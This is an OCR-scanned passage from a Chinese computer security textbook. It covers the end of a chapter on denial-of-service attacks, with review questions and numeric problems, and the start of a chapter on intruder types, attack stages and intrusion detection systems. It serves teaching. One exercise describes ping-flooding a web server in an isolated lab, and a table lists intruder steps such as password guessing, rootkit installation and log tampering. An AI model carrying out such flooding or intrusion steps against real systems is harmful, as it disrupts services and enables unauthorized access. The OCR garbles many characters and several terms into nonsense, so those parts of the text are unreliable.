组 织 可 能 也 希望 ISP 能 够 追踪 攻击 数据 包 流 而 确定 这 些 包 的 源 。 然 而 ， 如 果 攻 击 使 用 了 源 
地 址 欺骗 ， 这 将 是 很 困难 的 ， 而 且 非 常 耗 时 。 是 否 这 样 做 ， 取决 于 组 织 是 否 希 望 将 攻击 报告 给 
相关 的 执法 部 门 。 如 果 组 织 希 望 借 助 于 法 律 手段 解决 问题 ， 还 必须 收集 男 外 的 证 据 ， 活 动 必须 
文档 化 ， 以 支持 后 续 的 法 律 诉讼 。 

如 果 攻 击 是 来 自 大 量 的 分 布 式 或 反射 系统 的 扩展 的 、 协 同 的 、 洪 泛 的 攻击 ， 那 么 要 想 过 
滤 挥 足够 的 数据 包 从 而 保证 网 络 连 接 的 连通 性 几乎 是 不 可 能 的 。 在 这 种 情况 下 ， 需 要 一 个 应 
急 策 略 来 切换 到 备份 服务 器 ， 或 者 快速 地 用 新 的 服务 器 建立 具有 新 地 址 的 新 站 点 ， 从 而 恢复 
服务 。 如 果 缺 乏 这 些 措 施 ， 一 旦 这 种 攻击 对 准 某 个 服务 器 ， 那 么 这 个 服务 器 就 会 很 快 失去 其 
网 络 连 接 能 力 。 当 一 个 组 织 的 某 些 职能 依赖 于 网 络 连接 时 ， 这 种 攻击 所 产生 的 影响 就 会 更 加 
明显 。 

除了 快速 地 对 这 种 类 型 的 攻击 进行 响应 外 ,组 织 的 事故 响应 策略 应 该 确定 用 来 响应 类 似 的 
意外 情况 的 进 一 一 步 措施 。 这 包括 了 攻击 分 析 和 响应 ， 并 从 经 验 中 吸取 教训 以 改进 今后 的 处 理 措 
施 。 理 想 情 况 下 ， 一 个 组 织 的 安全 性 能 是 可 以 得 到 改善 的 。 在 第 17 章 中 ,我 们 将 会 进一步 探 
讨 事 故 啊 应 策略 。 


78 关键 术语 、 复 习题 和 习题 


关键 术语 
amplification attack (放大 攻击 ) ICMP flood (ICMP 洪 泛 ) 
availability (可 用 性 ) poison packet (有 毒 数据 包 ) 
backscatter traffic (发 散 反 馈 流 量 ) random drop (随机 丢弃 ) 
botnet (僵尸 网 络 ) reflection attack (反射 攻击 ) 
Denial of Service (DoS， 拒 绝 服务 攻击 ) source address spoofing ( 源 地 址 欺骗) 
directed broadcast ( 定 问 广播 ) SYN flood (SYN 洪 泛 ) 
Distributed Denial of Service ( DDoS， 分 布 式 拒绝 SYN spoofing (SYN 欺骗 ) 
服务 攻击 ) three-way TCP handshake (TCP 三 次 握手 ) 
DNS amplification attack (DNS 放大 攻击 ) UDP flood (UDP 洪 泛 ) 


flooding attack (HEYZ WG) zombie (僵尸 机 ) 


7È FEXAMAR#E 175 


复习 题 


7.1 
Ta 
V2 
7.4 
7.5 
7.6 
7.7 
7.8 
72 
7.10 
7.11 
A Sa 
BAS 
7.14 
7.15 
7.16 


ok? 
7.18 


试 述 拒绝 服务 (DoS) 攻击 的 定义 。 

哪些 类 型 的 资源 被 DoS 攻击 作为 攻击 目标 ? 

洪 泛 攻击 的 目标 是 什么 ? 

在 通常 的 洪 泛 攻击 当中 ， 一 般 会 使 用 什么 样 的 数据 包 ? 

为 什么 很 多 的 DoS 攻击 使 用 带 有 虚假 源 地 址 的 数据 包 ? 

什么 是 “后 向 散射 流量 ”? 它 能 为 哪 种 Dos 攻击 提供 信息 ” 它 不 能 为 哪 种 Dos 攻击 提供 信息 ? 

给 出 分 布 式 拒 绝 服务 (DDoS ) 攻击 的 定义 。 

DDoS 攻击 通常 所 使 用 的 体系 结构 是 什么 样 的 ? 

给 出 反射 攻击 的 定义 。 

给 出 放大 攻击 的 定义 。 

防范 DoS 攻击 的 基本 措施 是 什么 ? 在 哪里 实施 ? 

哪些 防范 措施 可 能 抵御 非 欺 骗 的 洪 泛 攻击 ?能 否 彻 底 预 防 这 种 攻击 ? 

什么 措施 可 以 防范 TCP SYN 欺骗 攻击 ? 

何 种 防护 措施 可 以 对 抗 DNS 放大 攻击 ? 在 哪 实施 ? 这 种 攻击 的 特殊 之 处 是 什么 ? 

什么 样 的 防御 措施 可 以 阻止 组 织 的 系统 在 广播 放大 攻击 中 被 用 作 媒 介 ? 

术语 slashdotted #il flash 群 组 指 的 是 什么 ?” 这 些 合 法 网 络 过 载 情 况 与 DoS 攻击 后 果 之 间 的 关系 是 
什么 ? 

当 检 测 到 DoS 攻击 时 ， 我 们 应 该 采取 什么 措施 ? 

有 什么 方法 可 以 被 用 来 追踪 DoS 攻击 中 所 使 用 数据 包 的 源头 ”是否 有 一 些 数据 包 与 其 他 数据 包 相 
比 更 容易 被 追踪 ? 


习题 


7.1 


Ted 


Ls 


7.4 


为 了 进行 经 典 的 DoS 洪 泛 攻击 ， 攻 击 者 必须 能 够 制造 出 足够 大 量 的 数据 包 来 占据 目标 系统 的 链 路 
容量 。 假 设 现在 有 一 个 利用 ICMP 回 送 请 求 (ping) 数据 包 的 DoS 攻击 ， 数 据 包 的 大 小 为 500 字 节 
(忽略 成 帧 开销 )。 对 于 一 个 使 用 0.5Mbps 带宽 链 路 的 目标 组 织 来 说 ， 攻 击 者 每 秒 钟 至 少 要 发 送 多 少 
个 数据 包 ， 才 能 进行 有 效 的 攻击 ?在 链 路 的 市 宽 为 2Mbps 和 10Mbps 的 情况 下 呢 ? 

在 TCP SYN 欺骗 攻击 中 ,攻击 者 目的 是 使 目标 系统 上 的 TCP 连接 请 求 表 溢出 ， 以 致 系统 对 合法 连 
接 请 求 不 能 进行 响应 。 假 设 目标 系统 上 的 TCP 连接 请 求 表 表 项 为 256 项， 目标 系统 的 每 次 超时 时 
间 为 30 秒 ， 人 允许 超时 次 数 为 5 次 。 如 果 一 个 连接 请 求 超时 没有 应 答 ， 而 且 超 时 次 数 大 于 5$， 那 么 这 
个 请 求 将 会 被 从 TCP 连接 请 求 表 中 清除 。 在 没有 相关 的 应 对 措施 和 攻击 者 已 经 占 满 了 目标 系统 的 
TCP 连接 请 求 表 的 情况 下 ， 为 了 能 够 持续 占 满 目标 系统 的 TCP 连接 请 求 表 ， 攻 击 者 应 该 以 什么 样 
的 速率 发 送 TCP 连接 请 求 ? 如 果 TCP SYN 数据 包 的 大 小 为 40 字 节 (忽略 成 帧 开销 )， 那 么 攻击 者 
所 发 送 的 请 求 数据 包 将 消耗 控 目 标 系统 多 少 带宽 ? 

在 分 布 式 的 洪 泛 攻击 (如 习题 7.1 所 述 ) 中 ， 假 设 攻击 者 已 经 控制 了 一 定数 量 的 高 带宽 僵尸 机 ， 而 且 
每 个 僵尸 机 有 着 同样 的 网 络 上 传 带 宽 128 kbps。 那 么 对 于 每 个 大 小 为 500 字 节 的 ICMP 回 送 请 求 数 
据 包 来 说 ， 单 一 的 僵尸 机 每 秒 钟 可 以 发 送 多 少 个 ? 攻击 者 至 少 需要 多 少 个 这 样 的 僵尸 机 才能 有 效 洪 
泛 网 络 带 宽 分 别 为 0.5Mbps、2Mbps 和 10Mbps 的 目标 系统 ”如果 已 知 一 个 拥有 数 千 个 僵尸 机 的 价 
尸 网 络 的 性 能 数据 信息 ,那么 当 这 个 僵尸 网 络 同时 发 起 攻击 时 你 可 以 想象 到 什么 ?或 者 想象 一 下 ， 
一 个 大 规模 的 组 织 具 有 多 条 大 容量 的 链接 ， 上 述 情况 又 如 何 ? 

为 了 进行 DNS 放大 攻击 ， 攻 击 者 必须 制造 出 足 量 的 数据 包 ， 来 触发 中 间 媒 介 产 生 大 量 的 DNS 应 答 
数据 包 给 目标 系统 ， 并 耗 尽 目 标 系 统 的 网 络 带宽 。 假 设 ，DNS 应 答 数 据 包 的 大 小 为 500 F (不计 
头 部 )， 攻 击 者 每 秒 钟 至 少 要 使 中 间 媒 介 产 生 多 少 个 DNS 应 答 数 据 包 才能 有 效 地 攻击 网 络 带 宽 分 别 
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7.5 


7.6 
ri 


7.8 


H 0.5Mbps, 2Mbps 和 10Mbps 的 目标 系统 ? 如果 DNS 请 求 数据 包 的 大 小 为 60 字 节 ， 那 么 对 于 上 
述 三 种 带宽 的 攻击 ， 攻 击 者 要 分 别 消 耗 多 少 的 本 地 带宽 ? 

关于 对 SYN cookie 或 者 其 他 类 似 机 制 的 研究 ， 首 先 你 必须 拥有 对 某 操作 系统 (如 BSD. Linux, 
MacOSX., Solaris 或 Windows) 的 访问 权限 。 如 果 可 以 访问 ， 就 要 决定 是 否 默 认 开 局? 如 果 不 能 访 
问 ， 我 们 该 怎么 做 呢 ? 

调研 如 何在 路 由 器 (最 好 是 你 们 组 织 使 用 的 型 号 ) 中 实施 反 欺 骗 过 滤器 和 定向 广播 过 滤器 ? 

假设 在 将 来 ， 针 对 DoS 攻击 的 安全 应 对 措施 被 广泛 地 实施 了 ， 而 且 反 欺骗 和 定向 广播 过 滤 也 被 广泛 
地 安装 了 ， 而且，PC 机 和 工作 站 系统 的 安全 更 加 得 到 人 们 的 重视 了 ， 伪 尸 网 络 很 难 形成 。 那 么 服 
务 器 系统 的 管理 员 还 有 必要 关心 DoS 攻击 吗 ? WRB, DoS 攻击 会 以 什么 样 的 形式 出 现 ? 我们 需 
要 什么 样 的 应 对 措施 ， 以 减少 其 影响 ? 

假设 你 在 一 个 网 络 实验 室 从 事 一 项 专门 的 、 独 立 的 测试 网 络 研究 ， 研 究 的 是 该 系统 的 高 流量 容量 的 
性 能 。 开 启 所 有 的 合适 Web 服务 器 (如 Apache, IIS, TinyWeb 等 )。 记 录 下 此 系统 的 了 PP 地址 ， 然 
后 用 其 他 的 主机 系统 来 查询 此 系统 的 服务 器 。 首 先 确 定 如 何 通过 设置 ping 命令 参数 才能 产生 大 小 为 
1500 字 节 的 ping 数据 包 。 如 果 你 拥有 足够 权限 的 话 ， 利 用 参数 “-f” 可 以 做 到 。 和 否则， 确定 如 何 
在 单位 时 间 内 产生 尽 可 能 多 的 数据 包 。 在 多 个 系统 上 同时 运行 ping 命令 ， 数 据 包 指 向 Web ARG A 
的 地 址 。 现 在 看 看 在 服务 右上 对 于 这 些 数 据 包 有 些 什 么 反应 。 然 后 ， 局 用 更 多 的 主机 系统 ， 直 到 响 
应 变 慢 以 致 无 反应 。 值 得 注意 的 是 ， 由 于 攻击 源 、 查 询 系统 和 目标 系统 都 在 同一 个 LAN 上 ， 相 当 
高 的 数据 包 速 率 是 造成 问题 所 必需 的 。 如 果 你 的 网 络 实验 室 拥 有 合适 的 设备 器 材 来 完成 的 话 ， 可 以 
尝试 一 下 ， 将 攻击 系统 和 查询 系统 放 在 不 同 于 目标 系统 的 局 域 网 上 ， 而 且 在 这 两 个 局 域 网 之 间 的 链 
路 容量 相对 较 低 ， 这 样 的 话 ， 所 需要 的 攻击 系统 数量 可 以 大 大 减少 。 你 也 能 够 模仿 [DAMO12] 中 提 
供 的 练习 ， 利 用 Slowloris 和 RUDY 来 研究 应 用 程序 级 的 DoS 攻击 。 
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学 习 目 标 

学 习 完 本 章 之 后 ， 你 应 该 能 

区 别 不 同类 型 的 入 侵 者 行为 模式 ; 

理解 入 侵 检 测 的 基本 原理 和 要 求 ; 

论述 基于 主机 的 入 侵 检 测 的 关键 特性 ; 
解释 分 布 式 基于 主机 的 入 侵 检 测 的 概念 ; 
论述 基于 网 络 的 入 侵 检 测 的 关键 特性 ; 
定义 入 侵 检 测 交 换 格 式 ; 

解释 密 饶 的 作用 ; 

概述 Snort. 


对 于 联网 的 系统 来 说 ， 一 个 重要 的 安全 问题 是 由 用 户 或 软件 引起 的 恶意 或 者 至 少 是 不 期 望 
发 生 的 非法 入 侵 。 用 户 非法 入 侵 可 能 采用 的 方式 是 在 未 经 授权 的 情况 下 登录 到 计算 机 或 通过 其 
他 方式 访问 机 器 ， 也 可 能 是 已 授权 用 户 非法 获取 更 高 级 别 的 权限 或 进行 其 权限 以 外 的 操作 。 正 
如 我 们 在 第 6 曹 中 讨论 的 ， 软 件 非 法 入 侵 包含 一 系列 恶意 软件 变种 。 

本 章 主 要 对 入 侵 这 个 主题 进行 讨论 。 首 先 ， 我 们 研究 人 侵 者 的 实质 及 他 们 是 如 何 进行 攻击 
的 ， 然 后 讨论 检测 入 侵 的 策略 。 


8.1 入 侵 者 


入 侵 者 对 于 某 些 形式 的 黑客 技术 的 使 用 是 关键 的 安全 威胁 之 一 ， 这 里 的 入 侵 者 通常 指 的 
是 黑客 或 者 破解 者 。 威 瑞 森 (Verizon) [VERI16] 根据 他 们 所 做 的 调查 ， 指 出 92% 的 破坏 是 由 
外 部 人 员 造 成 的 ，14% 是 内 部 人 员 所 为 ， 其 中 某 些 破坏 同时 涉及 外 部 人 员 和 内 部 人 员 ; 他 们 
还 指出 内 部 人 员 应 该 对 少数 非常 大 的 数据 集 损坏 负责 。 赛 门 铁 克 (Symantec) [SYMA16] 和 威 
瑞 森 [VERI16] 同时 还 指出 ,不 但 恶意 黑客 行为 在 普遍 增加 ， 而 且 针 对 组 织 中 的 个 人 及 他 们 使 
FAR IT 系统 的 攻击 也 在 增加 。 这 种 趋势 凸显 了 使 用 深度 防御 策略 的 必要 性 ， 因 为 这 类 有 目标 
的 攻击 可 能 有 专门 的 设计 来 绕 过 诸如 防火 墙 和 基于 网 络 的 入 侵 检 测 系 统 ( Intrusion Detection 
System, IDS) 之 类 的 边界 防御 。 
就 任何 一 种 防御 策略 而 言 ， 对 于 攻击 者 可 能 的 动机 的 理解 ， 将 有 助 于 设计 合适 的 防御 策 
略 。 另 外 ， 赛 门 铁 克 [SYMA16] 和 威 瑞 森 [VERI16] 也 给 出 了 关于 入 侵 者 的 粗略 的 分 类 : 
e 网 络 罪犯 (cyber criminal): 他 们 是 个 人 或 者 以 金钱 回报 为 目的 的 犯罪 组 织 的 成 员 。 为 
了 达到 获 利 的 目的 ， 他 们 的 行为 可 能 包括 身份 窃取 、 金 融 赁 证 窃取 、 公 司 间 谍 、 数 据 
窃取 或 者 数据 勒索 。 他 们 通常 很 年 轻 ， 一 般 在 网 络 上 进行 交易 [ANTE06]。 他 们 一 般 是 
东欧 、 俄 罗斯 或 者 东南 亚 的 黑客， 在 像 DarkMarket.org 或 theftservices.com 这 样 的 地 下 
论坛 会 面 、 交 流 心 得 、 买 卖 数据 和 合作 攻击 。 不 少 诸如 [SYMA16] 这 样 的 年 度 报告 已 
经 说 明了 这 类 网 络 犯 罪行 为 导致 的 巨大 上 且 还 在 增长 的 损失 ， 因 此 有 必要 采取 措施 来 解 
决 这 类 威胁 。 
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e 活动 家 (activist): 他 们 通常 是 工作 在 内 部 的 个 人 ， 或 者 更 大 的 外 部 攻击 者 组 织 的 一 员 。 
他 们 的 动机 通常 是 社会 或 者 政治 事业 。 他 们 也 作为 黑客 主义 者 而 为 人 们 所 熟知 ， 但 技 
能 水 平 通 篆 很 低 。 他 们 攻击 的 目的 主要 是 促进 和 宣传 他 们 的 事业 ， 通 篆 采 取 的 手段 是 
破坏 网 站 、 拒 绝 服务 攻击 、 宠 取 和 散布 能 导致 攻击 目标 妥协 或 者 对 其 进行 负面 宣传 的 
数据 等 。 最 近 众 所 周知 的 例子 包括 Anonymous 和 LulzSec 等 组 织 从 事 的 活动 、 切 尔 西 
(从 前 叫 布 兰 德 利 )' 曼 宁 (Chelsea Manning) 和 爱德华 . 斯 诺 登 ( Edward Snowden) 从 
事 的 活动 。 
国家 资助 的 组 织 (state-sponsored organization): 他 们 是 由 政府 所 资助 的 黑客 组 织 ， 目 
的 是 进行 谍报 或 者 破坏 活动 。 这 类 活动 就 是 人 们 所 熟知 的 高 级 持续 性 威胁 ( Advanced 
Persistent Threat, APT) 活动 ， 因 为 在 这 个 类 别 中 许多 攻击 涉及 长 时 间 的 隐蔽 性 和 持 
久 性 。 
其 他 (other): 他 们 是 以 上 未 列 出 的 以 其 他 目的 为 动机 的 黑客 ， 包 括 用 技术 挑战 同行 
以 获取 尊敬 和 名 声 为 目的 的 典型 黑客 或 破解 者 ， 以 及 那些 负责 寻找 新 的 缓冲 区 溢出 漏 
洞 [MEER10] 的 黑客 。 男 外 ， 由 于 攻击 工具 的 广泛 可 用 性 ， 还 有 一 类 “嗜好 性 黑客 ” 
(hobby hacker)， 他 们 使 用 这 些 工 具 来 探究 系统 和 网 络 的 安全 性 ， 他 们 是 上 面 那 几 类 黑 
客 的 潜在 的 新 生 力 量 。 
除了 上 面 这 种 分 类 ， 还 可 以 根据 入侵 者 的 技术 水 平 将 他 们 分 为 如 下 几 类 : 
e 学 徒 (apprentice) : 他 们 是 那些 拥有 最 低 技 术 水 平 的 黑客 ， 仅 仅 会 使 用 现 有 的 攻击 工具 
包 。 他 们 很 可 能 在 攻击 者 中 占 最 大 比例 ,包括 了 许多 犯罪 者 和 活动 家 黑客 。 考 虑 到 他 
们 使 用 现 有 的 攻击 工具 ， 因 此 这 些 攻击 者 也 非常 容易 防御 。 因 为 他 们 使 用 现 有 的 脚本 
(工具 )， 所 以 人 们 也 称 他 们 为 “脚本 小 子 ”(script-kiddy ) 。 
训练 有 素 者 (journeyman) : 他 们 是 那些 拥有 足够 技术 的 黑客 ， 可 以 修改 和 扩展 攻击 工 
具 来 使 用 新 发 现 的 或 者 购买 的 漏洞 ， 攻 击 不 同 的 目标 组 织 。 他 们 也 可 能 发 现 和 利用 与 
已 知 漏洞 类 似 的 新 漏洞 。 许 多 有 这 些 技能 的 黑客 可 以 调整 攻击 工具 为 他 人 使 用 ， 并 且 
他 们 存在 于 上 面 列 出 的 各 类 入 侵 者 中 。 攻 击 工具 的 改变 会 使 识别 和 防御 这 些 攻 击 更 加 
困难 。 
e 高 手 (master) : 他 们 是 那些 拥有 高 级 技术 的 黑客 ， 有 能 力 发 现 标志 性 的 新 漏洞 ， 或 者 
编写 全 新 的 强力 攻击 工具 包 。 一 些 更 为 知名 的 典型 黑客 都 可 以 归 为 这 一 类 ， 很 显然 ， 
他 们 中 的 一 部 分 人 会 被 某 些 政府 组 织 所 雇用 ， 从 事 APT 攻击 活动 。 这 使 防御 这 类 攻击 
最 为 困难 。 
人 入侵 者 的 攻击 可 能 是 无 恶意 的 ， 也 可 能 是 有 恶意 的 。 无 恶意 攻击 是 指 人 们 仅仅 希望 探索 一 
下 Intermmet， 看 看 那里 到 底 是 什么 。 而 恶意 攻击 则 是 指 某 些 个 人 试图 读 取 一 些 特权 数据 ， 在 未 
经 授权 的 情况 下 对 数据 进行 修改 ,或 者 破坏 系统 。 
NIST SP 800-61 (计算 机 安全 事件 处 理 指南 ，2012 年 8 月 ) 列 出 了 以 下 一 些 入 侵 实 例 : 
实施 电子 邮件 服务 需 的 远程 根 目 录 泄 露 。 
破坏 Web Ak 4% - 
猜测 和 破解 口令 。 
复制 一 个 存 有 信用 卡 账号 的 数据 库 。 
在 未 授权 的 情况 下 浏览 敏感 数据 ， 包 括 工 资 记录 和 医疗 信息 等 。 
在 工作 站 上 运行 数据 包 嗅 探 需 来 捕获 用 户 名 和 口令 。 
利用 匿名 FTP 服务 器 的 权限 错误 发 送 盗版 软件 和 音乐 文件 。 
拨号 到 一 个 不 安全 的 调制 解 调 需 ， 以 获得 内 网 的 访问 权限 。 


B8HF% ABRA 179 


e 伪装 成 管理 人 员 ， 呼 叫 帮助 平台 ， 重 置 该 管理 人 员 的 电子 邮件 口令 并 学 习 新 的 口令 。 

e 在 未 授权 的 情况 下 使 用 一 个 无 人 值守 的 已 登录 的 工作 站 。 

本 章 和 第 9 章 分 别 描述 的 入 侵 检 测 系 统 (IDS) 和 入 侵 防 御 系 统 (Intrusion Prevention 
System，IPS) 就 是 用 来 应 对 这 些 威胁 的 。 它 们 能 够 相当 有 效 地 对 抗 已 知 的 、 低 复杂 度 的 攻击 ， 
比如 那些 活动 家 组 织 的 攻击 或 者 大 规模 的 电子 邮件 诈骗 等 。 它 们 面 对 由 一 些 罪 犯 或 者 政府 支持 
的 入 侵 者 所 发 起 的 更 为 复杂 的 、 有 目标 的 攻击 则 可 能 比较 低 效 ， 这 是 由 于 这 些 攻 击 更 可 能 使 用 
新 的 、0-day 漏洞 ， 从 而 让 他 们 在 目标 系统 上 的 活动 变 得 隐秘 。 因 此 ， 需 要 一 部 分 深度 防御 策 
略 ， 包 括 敏感 信息 和 详细 审计 的 加 密 ， 强 认证 和 授权 控制 ， 以 及 操作 系统 和 应 用 程序 安全 的 主 
动 管理 。 

入 侵 者 行为 

入 侵 者 的 技术 和 行为 模式 总 是 在 不 断 地 变化 以 利用 新 发 现 的 系统 弱点 并 规避 检测 和 对 策 。 
然而 ， 和 信 侵 者 通常 使 用 常规 攻击 方法 中 的 某 些 步 又 发 起 攻击 。[VERI16] 中 的 “总 结 ” 部 分 列 
举 了 一 系列 典型 的 操作 ， 首 先是 一 个 网 络 钓鱼 攻击 ， 该 攻击 安装 知 取 登录 凭据 的 恶意 软件 ， 并 
最 终 导致 销售 点 终端 的 破坏 。 它 们 指出 ， 虽 然 这 是 一 个 特定 事件 场景 ， 但 这 些 典 型 操作 在 许多 
攻击 中 都 很 常见 。[MCCL12] 详细 讨论 了 与 以 下 步骤 相关 的 更 广泛 的 活动 : 

e 目标 获取 和 信息 收集 : 攻击 者 使 用 公开 可 用 的 信息 (技术 和 非 技 术 信息 ) 以 及 网 络 探索 

工具 来 映射 目标 资源 ， 以 识别 和 表征 目标 系统 。 

e 初始 访问 : 对 目标 系统 的 初始 访问 通常 可 以 利用 远程 网 络 漏洞 (如 我 们 将 在 第 10 章 和 
第 11 章 中 讨论 的 )， 通 过 第 3 章 中 讨论 的 远程 服务 中 使 用 的 猜测 弱 身 份 验证 凭证 ; 或 
像 我 们 在 第 6 章 讨 论 的 那样 ， 通 过 系统 中 的 恶意 软件 安装 ， 使 用 某 种 形式 的 社会 工程 
或 路 过 式 下 载 攻击 。 

e 权限 提升 : 这 是 在 系统 上 采取 的 行为 (具有 代表 性 的 是 通过 本 地 访问 漏洞 ， 我 们 将 
在 第 10 章 和 第 11 章 中 讨论 )， 提 升 攻 击 者 可 用 的 权限 以 实现 其 在 目标 系统 上 的 期 望 
目标 。 

e 信息 收集 或 系统 利用 : 攻击 者 访问 或 修改 系统 信息 或 资源 ， 或 导航 到 另 一 个 目标 系统 
的 行为 。 

e 维持 访问 权限 : 这 类 行为 是 指 我 们 在 第 6 章 讨论 过 的 攻击 者 安装 后 门 或 其 他 恶意 软件 ， 
或 者 通过 改变 认证 证 书 或 改变 系统 的 其 他 配置 ， 以 使 攻击 者 在 初始 攻击 后 继续 访问 。 

e FARDE: 这 是 指 我 们 将 在 第 18 章 讨论 的 ， 攻 击 者 破坏 或 者 修改 审计 日 志 来 消除 攻击 
活动 的 证 据 ， 或 者 使 用 工具 包 或 其 他 措施 来 隐藏 悄悄 安装 的 文件 或 代码 ， 这 一 点 我 们 
在 第 6 章 已 经 有 所 讨论 。 

K 8-1 列 出 了 一 些 与 以 上 步骤 相关 的 行为 实例 。 


表 8-1 入 侵 者 行为 实例 
a) 目标 获取 和 信息 收集 


探测 公司 网 站 来 获取 相关 信息 ， 例 如 公司 组 织 结构 、 人 员 、 关 键 系统 ， 以 及 具体 网 站 服务 器 和 采用 的 操作 系 


使 用 DNS 查询 工具 收集 目标 网 络 的 相关 信息 ， 这 些 查询 工具 包括 dig. host 等 ， 或 者 查询 WHOIS 数据 库 
使 用 NMAP 等 工具 映射 网 络 以 获取 可 访问 的 服务 

向 客户 服务 联系 人 发 送 查 询 电子 邮件 ， 查 看 有 关 邮 件 客 户 端 、 服 务 器 和 所 使 用 的 操作 系统 的 信息 的 响应 ， 以 
及 个 人 响应 的 详细 信息 

确定 潜在 的 有 漏洞 的 服务 ， 例 如 有 漏洞 的 Web 内 容 管 理 系 统 (Web CMS) 
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( 续 ) 


b) 初 始 访问 


e Ake (猜测 ) 用 户 的 Web 内 容 管 理 系统 (CMS) 的 密码 

@ 利用 Web CMS 插件 的 漏洞 来 获取 系统 访问 权限 

e 将 具有 链接 到 Web 浏览 器 漏洞 的 钓鱼 式 电 子 邮件 发 送 给 关键 人 员 
c) 权限 提升 


使 用 漏洞 扫描 系统 以 获取 可 以 本 地 利用 的 应 用 程序 
攻击 任意 一 个 带 漏洞 的 程序 来 获得 高 级 访问 权限 
安装 嗅 探 程 序 来 捕获 管理 员 口 令 
利用 捕获 到 的 管理 员 口 令 来 访问 特权 信息 


d) 信息 收集 或 系统 利用 


o 扫描 文件 来 寻找 想 要 的 信息 
o 将 大 量 的 文档 传送 到 外 部 存储 库 
o 使 用 猜测 的 或 者 捕获 的 口令 来 访问 网 络 中 的 其 他 服务 器 


e) 维持 访问 权限 


o 安装 远程 管理 工具 或 者 带 后 门 的 rootkit 以 方便 以 后 的 访问 
© 在 以 后 对 网 络 进行 访问 时 使 用 管理 员 口 令 
© 修改 或 者 破坏 系统 上 运行 的 反 病 毒 程序 或 者 IDS 程序 


f) 覆盖 痕迹 


© {EJH rootkit 隐藏 安装 在 系统 中 的 文件 
@ 编辑 日 志文 件 来 移 除 人 侵 过 程 中 生成 的 相关 记录 


8.2 入侵 检测 
下 面 的 术语 与 我 们 的 讨论 相关 : 
安全 入 侵 : 未 经 授权 绕 过 系统 安全 机 制 的 行为 。 


入 侵 检 测 : 一 种 硬件 或 软件 功能 ， 该 功能 用 于 收集 和 分 析 计 算 机 或 网 络 中 各 个 区 域 的 信息 ， 
以 识别 可 能 的 安全 入 侵 。 





IDS 包括 三 个 逻辑 组 件 : 

o 传感器 (sensor): 传 感 兰 负责 收集 数据 。 传 感 器 的 输入 可 以 是 包含 人 侵 证 据 的 系统 的 
任何 一 部 分 。 传 感 需 输 入 的 类 型 包括 网 络 数据 包 、 日 志文 件 和 系统 调用 痕迹 。 传 感 器 
收集 并 回 分 析 天 转发 这 些 信息 。 

e 分 析 器 (analyzer): 分 析 器 从 一 个 或 多 个 传 感 融 或 其 他 分 析 器 接收 输入 。 分 析 器 负责 
确定 是 否 发 生 了 入 侵 ; 此 组 件 的 输出 表明 是 否 发 生 了 入 侵 ， 可 以 包 售 支持 入 侵 发 生 这 
一 结论 的 证 据 。 分 析 器 可 以 提供 指导 ， 用 于 判断 什么 活动 是 人 侵 导 致 的 。 传 感 器 的 输 
和 也 可 以 被 存储 起 来 用 于 将 来 的 分 析 ， 这 些 输入 可 以 在 存储 器 或 者 数据 库 组 件 中 进行 
检查 。 

e 用 户 接 口 (user interface): IDS 的 用 户 接口 使 用 户 能 够 查看 系统 输出 或 控制 系统 的 行为 。 
在 某 些 系统 ， 用 户 接口 可 以 被 看 作 是 经 理 、 主 管 或 者 控制 台 组 件 。 

IDS 可 以 只 使 用 一 个 传 感 姻 和 分 析 器 ， 例 如 典型 的 一 台 主 机 上 的 HDS 或 者 一 个 防火 墙 设 

备 上 的 NIDS。 更 为 复杂 的 IDS 可 以 在 主机 或 者 网 络 设备 上 使 用 多 个 传感器 ， 并 发 送信 息 到 一 
个 中 心 分 析 器 和 一 个 分 布 式 结 构 的 用 户 接 口 。 
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IDS 通常 根据 分 析 数 据 的 来 源 和 类 型 进行 分 类 ， 如 : 

e 基于 主机 的 IDS ( Host-based IDS, HIDS): 监测 一 台 主 机 的 特征 和 该 主机 发 生 的 与 可 疑 
活动 相关 的 事件 ， 例 如 进程 识别 器 、 进 程 产 生 的 系统 调用 等 ， 用 作 可 疑 活 动 的 证 据 。 

e 基于 网 络 的 1DS (Network-based IDS, NIDS): 监测 特定 的 网 段 或 设备 的 流量 并 分 析 
网 络 、 传 输 和 应 用 协议 ， 用 以 识别 可 疑 的 活动 。 

e 分 布 式 或 混合 式 IDS (Distributed or hybrid IDS): 将 来 自 大 量 传感器 (通常 是 主机 和 基 
于 网 络 的 ) 的 信息 组 合 在 一 个 中 央 分 析 器 中 ， 以 便 更 好 地 识别 和 啊 应 入 侵 活动 。 


8.2.1 基本 原理 


身份 认证 设备 、 访 问 控制 设施 和 防火 墙 在 阻 断 入 侵 方 面 都 起 到 了 一 定 的 作用 。 另 一 道 防线 
是 和 人 侵 检测 ， 它 也 是 近年 来 许多 研究 的 热点 。 使 得 入侵 检测 成 为 研究 热点 有 许多 方面 的 原因 ， 
包括 如 下 : 

1. 如 果 能 快速 地 检测 到 入 侵 ， 就 可 以 在 损害 发 生 或 者 数据 受到 威胁 之 前 ， 将 人 侵 者 识别 出 
来 并 将 其 逐 出 系统 。 即 使 未 能 及 时 地 检测 出 入侵 者 ， 但 越 早 检测 到 入 侵 ， 则 对 系统 造成 的 损失 
越 小 ， 而 且 越 容易 进行 快速 的 恢复 。 

2. 有 效 的 IDS 可 以 作为 一 个 威慑 ， 从 而 达到 阻止 人 侵 的 目的 。 

3. 入 侵 检 测 可 以 收集 关于 入 侵 技 术 的 信息 ， 用 于 增强 入 侵 防 御 系 统 的 防护 能 力 。 

入 侵 检 测 基于 如 下 假设 : 入侵 者 的 行为 和 合法 用 户 的 行为 之 间 存 在 可 以 量化 的 差别 。 当 
SR, 我们 不 能 期 望 入 侵 者 的 攻击 和 一 个 授权 用 户 对 资源 的 正常 使 用 之 间 有 清晰 、 精 确 的 区 分 。 
事实 上 ,我们 认为 两 者 之 间 会 有 一 些 重 倒 的 部 分 。 

图 8-1 以 抽象 的 方式 提出 了 IDS 设计 者 面临 的 任务 的 性 质 。 尽 管 入 侵 者 的 典型 行为 与 授权 
用 户 的 典型 行为 不 同 ， 但 这 些 行 为 间 仍 有 重 叠 部 分 。 因 此 ， 如 果 对 人 侵 者 行为 的 定义 过 于 宽 
松 ， 虽 然 能 够 发 现 更 多 的 人 侵 者 ， 但 是 也 容易 导致 大 量 的 误 报 (false positive)， 或 者 虚假 警报 ， 
即将 授权 用 户 误 认为 人 侵 者 。 相 反 ， 如 果 为 了 减少 误 报 而 对 入 侵 者 行为 的 定义 过 于 严格 ， 这 将 
导致 漏 报 ( false negative) 增加 ， 可 能 漏 过 真实 的 人 侵 者 。 因 此 ， 入 侵 检 测 系统 的 实践 是 一 门 
